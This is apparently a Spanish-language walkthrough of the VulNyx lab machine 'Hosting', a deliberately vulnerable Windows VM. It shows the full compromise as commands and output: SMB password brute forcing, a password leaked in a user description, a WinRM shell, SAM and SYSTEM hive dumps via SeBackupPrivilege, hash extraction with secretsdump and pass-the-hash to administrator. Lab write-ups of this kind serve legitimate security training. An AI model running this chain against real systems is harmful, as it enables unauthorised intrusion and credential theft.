VulNyx - Hosting
Information
Hosting es una máquina virtual vulnerable Windows de dificultad fácil de la plataforma VulNyx, fue creada por el usuario d4t4s3c y funciona correctamente en el hipervisor VirtualBox.
Enumeration
Nmap
TCP
❯ nmap -n -Pn -sS -p- --min-rate 5000 192.168.1.58
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-05 12:22 CEST
Nmap scan report for 192.168.1.58
Host is up (0.00026s latency).
Not shown: 65520 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
5040/tcp open unknown
5985/tcp open wsman
7680/tcp open pando-pub
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49669/tcp open unknown
49670/tcp open unknown
❯ nmap -sVC -p80,135,139,445,5040,5985,7680,47001,49664,49665,49666,49667,49668,49669,49670 192.168.1.58
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-05 12:23 CEST
Nmap scan report for 192.168.1.58
Host is up (0.0013s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: IIS Windows
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
5040/tcp open unknown
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
7680/tcp open pando-pub?
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
MAC Address: 08:00:27:7D:4A:B2 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: -1s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2025-08-05T10:26:25
|_ start_date: N/A
|_nbstat: NetBIOS name: HOSTING, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:7d:4a:b2 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Shell (j.wilson)
80/TCP (HTTP)
Site (/)
Directory Brute Force
❯ gobuster dir -w /opt/directory-list-2.3-medium.txt -u http://192.168.1.58/
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.58/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/speed (Status: 301) [Size: 160] [--> http://192.168.1.58/speed/]
/Speed (Status: 301) [Size: 160] [--> http://192.168.1.58/Speed/]
Progress: 220545 / 220546 (100.00%)
===============================================================
Finished
===============================================================
Site (/speed)
En la sección TEAM de la navbar, encuentro varios posibles nombres de usuario
Obtengo los posibles nombres de usuario y creo un wordlist de usuarios para futuros ataques
❯ curl -sX GET "http://192.168.1.58/speed/" | html2text | grep '@' | cut -d '@' -f 1 | tee users.dic
p.smith
a.krist
m.faeny
k.lendy
445/TCP (SMB)
Basic Enumeration
❯ netexec smb 192.168.1.58
SMB 192.168.1.58 445 HOSTING [*] Windows 10 / Server 2019 Build 19041 x64 (name:HOSTING) (domain:HOSTING) (signing:False) (SMBv1:False)
Shares
Null Session (Failed)
❯ smbclient -NL //192.168.1.58
session setup failed: NT_STATUS_ACCESS_DENIED
❯ smbmap --no-banner -H 192.168.1.58 -u '' -p ''
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 0 authenticated session(s)
[!] Something weird happened on (192.168.1.58) Error occurs while reading from remote(104) on line 1015
[*] Closed 1 connections
❯ netexec smb 192.168.1.58 -u '' -p '' --shares
SMB 192.168.1.58 445 HOSTING [*] Windows 10 / Server 2019 Build 19041 x64 (name:HOSTING) (domain:HOSTING) (signing:False) (SMBv1:False)
SMB 192.168.1.58 445 HOSTING [-] HOSTING\: STATUS_ACCESS_DENIED
SMB 192.168.1.58 445 HOSTING [-] Error enumerating shares: Error occurs while reading from remote(104)
RPC
Null Session (Failed)
❯ rpcclient -NU "" 192.168.1.58 -c "srvinfo"
Cannot connect to server. Error was NT_STATUS_ACCESS_DENIED
Password Brute Force
En tenencia de usuarios intento con netexec obtener algún password y obtengo éxito con las credenciales: p.smith:kissme
❯ netexec smb 192.168.1.58 -u p.smith -p /opt/techyou.txt
SMB 192.168.1.58 445 HOSTING [*] Windows 10 / Server 2019 Build 19041 x64 (name:HOSTING) (domain:HOSTING) (signing:False) (SMBv1:False)
SMB 192.168.1.58 445 HOSTING [-] HOSTING\p.smith:eduardo STATUS_LOGON_FAILURE
SMB 192.168.1.58 445 HOSTING [-] HOSTING\p.smith:andres STATUS_LOGON_FAILURE
SMB 192.168.1.58 445 HOSTING [-] HOSTING\p.smith:courtney STATUS_LOGON_FAILURE
SMB 192.168.1.58 445 HOSTING [-] HOSTING\p.smith:booboo STATUS_LOGON_FAILURE
SMB 192.168.1.58 445 HOSTING [+] HOSTING\p.smith:kissme
Al validar las credenciales del usuario p.smith, observo que son validas por SMB pero no por WINRM
(Es posible que el usuario p.smith no forme parte del grupo Remote Management Users)
❯ netexec smb 192.168.1.58 -u 'p.smith' -p 'kissme' 2>/dev/null
SMB 192.168.1.58 445 HOSTING [*] Windows 10 / Server 2019 Build 19041 x64 (name:HOSTING) (domain:HOSTING) (signing:False) (SMBv1:False)
SMB 192.168.1.58 445 HOSTING [+] HOSTING\p.smith:kissme
❯ netexec winrm 192.168.1.58 -u 'p.smith' -p 'kissme' 2>/dev/null
WINRM 192.168.1.58 5985 HOSTING [*] Windows 10 / Server 2019 Build 19041 (name:HOSTING) (domain:HOSTING)
WINRM 192.168.1.58 5985 HOSTING [-] HOSTING\p.smith:kissme
RPC
Auth
Encuentro nuevos usuarios y en la descripción del usuario m.davis obtengo el password H0$T1nG123!
❯ rpcclient -U "p.smith%kissme" 192.168.1.58 -c "querydispinfo and enumdomusers"
index: 0x1 RID: 0x1f4 acb: 0x00000211 Account: Administrador Name: (null) Desc: (null)
index: 0x2 RID: 0x3ea acb: 0x00000214 Account: administrator Name: Administrator Desc: (null)
index: 0x3 RID: 0x1f7 acb: 0x00000215 Account: DefaultAccount Name: (null) Desc: (null)
index: 0x4 RID: 0x3ec acb: 0x00000214 Account: f.miller Name: Frank Miller Desc: (null)
index: 0x5 RID: 0x1f5 acb: 0x00000215 Account: Invitado Name: (null) Desc: (null)
index: 0x6 RID: 0x3ee acb: 0x00000214 Account: j.wilson Name: John Wilson Desc: (null)
index: 0x7 RID: 0x3ed acb: 0x00000214 Account: m.davis Name: Mike Davis Desc: H0$T1nG123!
index: 0x8 RID: 0x3eb acb: 0x00000214 Account: p.smith Name: Paul Smith Desc: (null)
index: 0x9 RID: 0x1f8 acb: 0x00000011 Account: WDAGUtilityAccount Name: (null) Desc: (null)
❯ rpcclient -U "p.smith%kissme" 192.168.1.58 -c "enumdomusers" | grep -oP '\[.*?\]' | tr -d '[]' | grep -v '0x' >> users.dic
User Brute Force
Verifico que el password H0$T1nG123! es del usuario j.wilson
❯ netexec smb 192.168.1.58 -u users.dic -p 'H0$T1nG123!' --ignore-pw-decoding
SMB 192.168.1.58 445 HOSTING [*] Windows 10 / Server 2019 Build 19041 x64 (name:HOSTING) (domain:HOSTING) (signing:False) (SMBv1:False)
SMB 192.168.1.58 445 HOSTING [-] HOSTING\administrator:H0$T1nG123! STATUS_LOGON_FAILURE
SMB 192.168.1.58 445 HOSTING [-] HOSTING\f.miller:H0$T1nG123! STATUS_LOGON_FAILURE
SMB 192.168.1.58 445 HOSTING [+] HOSTING\j.wilson:H0$T1nG123!
❯ netexec smb 192.168.1.58 -u j.wilson -p 'H0$T1nG123!'
SMB 192.168.1.58 445 HOSTING [*] Windows 10 / Server 2019 Build 19041 x64 (name:HOSTING) (domain:HOSTING) (signing:False) (SMBv1:False)
SMB 192.168.1.58 445 HOSTING [+] HOSTING\j.wilson:H0$T1nG123!
5985/TCP (WINRM)
Valido credenciales y accedo al sistema como usuario j.wilson
❯ netexec winrm 192.168.1.58 -u j.wilson -p 'H0$T1nG123!' 2>/dev/null
WINRM 192.168.1.58 5985 HOSTING [*] Windows 10 / Server 2019 Build 19041 (name:HOSTING) (domain:HOSTING)
WINRM 192.168.1.58 5985 HOSTING [+] HOSTING\j.wilson:H0$T1nG123! (Pwn3d!)
❯ evil-winrm -i 192.168.1.58 -u j.wilson -p 'H0$T1nG123!'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\j.wilson\Documents> whoami ; hostname
hosting\j.wilson
HOSTING
Privilege Escalation
Enumeration
Privileges
El usuario j.wilson dispone del privilegio SeBackupPrivilege
*Evil-WinRM* PS C:\> whoami /priv
INFORMACIàN DE PRIVILEGIOS
--------------------------
Nombre de privilegio Descripci¢n Estado
============================= =================================================== ==========
SeBackupPrivilege Hacer copias de seguridad de archivos y directorios Habilitada
SeRestorePrivilege Restaurar archivos y directorios Habilitada
SeShutdownPrivilege Apagar el sistema Habilitada
SeChangeNotifyPrivilege Omitir comprobaci¢n de recorrido Habilitada
SeUndockPrivilege Quitar equipo de la estaci¢n de acoplamiento Habilitada
SeIncreaseWorkingSetPrivilege Aumentar el espacio de trabajo de un proceso Habilitada
SeTimeZonePrivilege Cambiar la zona horaria Habilitada
Abuse
SAM & SYSTEM
*Evil-WinRM* PS C:\Users\j.wilson\Desktop> reg save HKLM\SAM sam ; reg save HKLM\SYSTEM system
*Evil-WinRM* PS C:\Users\j.wilson\Desktop> ls
Directorio: C:\Users\j.wilson\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 8/5/2025 1:26 PM 57344 sam
-a---- 8/5/2025 1:26 PM 11980800 system
-a---- 9/2/2024 7:14 PM 70 user.txt
*Evil-WinRM* PS C:\Users\j.wilson\Desktop> download sam
*Evil-WinRM* PS C:\Users\j.wilson\Desktop> download system
Dump (NT Hash)
❯ impacket-secretsdump -system system -sam sam LOCAL
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0x827cc782adafc2fd1b7b7a48da1e20ba
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrador:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Invitado:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:8afe1e889d0977f8571b3dc0524648aa:::
administrator:1002:aad3b435b51404eeaad3b435b51404ee:41186fb28e283ff758bb3dbeb6fb4a5c:::
p.smith:1003:aad3b435b51404eeaad3b435b51404ee:2cf4020e126a3314482e5e87a3f39508:::
f.miller:1004:aad3b435b51404eeaad3b435b51404ee:851699978beb72d9b0b820532f74de8d:::
m.davis:1005:aad3b435b51404eeaad3b435b51404ee:851699978beb72d9b0b820532f74de8d:::
j.wilson:1006:aad3b435b51404eeaad3b435b51404ee:a6cf5ad66b08624854e80a8786ad6bac:::
[*] Cleaning up...
PassTheHash (PtH)
Valido credenciales con el hash obtenido y accedo como usuario administrator
❯ netexec winrm 192.168.1.58 -u 'administrator' -H '41186fb28e283ff758bb3dbeb6fb4a5c' 2>/dev/null
WINRM 192.168.1.58 5985 HOSTING [*] Windows 10 / Server 2019 Build 19041 (name:HOSTING) (domain:HOSTING)
WINRM 192.168.1.58 5985 HOSTING [+] HOSTING\administrator:41186fb28e283ff758bb3dbeb6fb4a5c (Pwn3d!)
❯ evil-winrm -i 192.168.1.58 -u 'administrator' -H '41186fb28e283ff758bb3dbeb6fb4a5c'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\administrator\Documents> whoami ; hostname
hosting\administrator
HOSTING
Flags
Ya como usuario administrator puedo leer las flags user.txt y root.txt
*Evil-WinRM* PS C:\> type c:\users\j.wilson\desktop\user.txt
50e*****************************
*Evil-WinRM* PS C:\> type c:\users\administrator\desktop\root.txt
992*****************************
Hasta aquí la resolución de la máquina Hosting.
Happy Hacking!